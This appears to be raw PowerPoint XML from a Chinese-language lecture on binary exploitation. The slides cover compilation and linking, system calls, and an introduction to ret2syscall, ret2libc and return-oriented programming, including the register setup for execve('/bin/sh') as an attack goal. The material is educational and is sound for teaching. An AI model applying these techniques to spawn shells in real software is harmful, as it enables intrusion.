            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB2AE2D-7A72-40F8-B4C5-27B456BC0702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60960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 (p1.o p2.o)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722A2B5D-6B07-4BCD-ABD6-CA7AB0C7877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4504344"/>
            <a:ext cx="2554103" cy="325563"/>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Executable (p)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Shape 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B03AACC0-31F1-4AC3-9969-CE4BDA91D537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="26995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1" name="Shape 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9C2E90-2CC0-4A01-8F70-498B6D1FA41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="34096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2" name="Shape 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D42C06A-6F40-4A4D-8BC5-5B7F893C187E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="4119795"/>
            <a:ext cx="0" cy="384549"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E35F9E-277A-4362-AF8D-1EA75EB9DF28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288350" y="27290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compiler: gcc -S</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{599FCD4F-CB15-4937-AA68-7AEE0D275DEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7447775" y="34391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assembler: gcc or as</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38AA1808-83D4-4307-A480-8514FA9EAC19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288350" y="41492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linker: gcc or ld</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C1D9EE-96D5-4E11-8313-96A2737125A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93049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Static Library (.a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Shape 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{022E0D13-5A86-4295-A30F-47D821A87770}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8650103" y="4119795"/>
            <a:ext cx="1931849" cy="547331"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE03D87-D78A-400E-AAB5-29FB96CD673E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332997" y="2228044"/>
            <a:ext cx="500649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源代码到可执行文件的生成过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83E32506-F6CA-49ED-B74A-90582F20BFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815753" y="2898770"/>
            <a:ext cx="404098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编译</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语言代码生成汇编代码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汇编</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由汇编代码生成机器码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链接</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将多个机器码的目标文件链接成一个可执行文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE4950BD-2EDF-4D2A-8F6C-D75517729040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="5889172"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333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FB6555C-3E05-4F34-871D-1DA28E079374}"/>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08909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3</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返回导向编程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC43481F-3B3B-4D80-AE04-A8383F14E9A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491840" y="2766155"/>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ret2syscall</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动态链接过程 </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ret2libc</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其它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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513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441375-0C44-49B3-ADBA-65BA3243996D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621003" y="1923871"/>
            <a:ext cx="8281434"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操作系统提供给用户的编程接口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是提供访问操作系统所管理的底层硬件的接口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本质上是一些内核函数代码，以规范的方式驱动硬件</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x86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>int 0x80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>指令进行系统调用、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>amd64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>syscall</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指令进行系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773BB1B4-2241-44A2-A2A8-44BCA1128992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088700" y="11445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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统调用</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7" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DE6005-05DC-4A14-9ED1-089CABF818B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088700" y="35321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举例</a:t>
            </a:r>
            <a:endParaRPr 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F43FCBD-5841-4354-92CA-E1BC6CDB204B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621003" y="4184471"/>
            <a:ext cx="9085885"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 -&gt; write()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(“Hello world!”);</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中的用户代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>		</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write(1, &amp;”Hello world!”, 12);</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中的用户代码</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 4; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = &amp;”Hello world!”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = 12; ] + int 0x80;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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内核中的内核代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABA1564-7487-44BF-937B-A7C8E2C441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1063422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817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9360013-6EB5-4ED1-B251-B05527C21559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631204" y="2231780"/>
            <a:ext cx="5235900" cy="3033783"/>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latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可是在程序中没有已存在的一段代码是：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, 0xb</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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, [“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>”] </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ecx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edx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int 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>	=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>",NULL,NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>我们仍然要执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>",NULL,NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>该怎么做呢？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A54133-4A71-41CF-9D5D-ECBB04E00DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0"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11" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E73E88F5-2219-4A18-B3D0-F0035F80B09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867104" y="2536581"/>
            <a:ext cx="6455396" cy="220052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7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>riented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
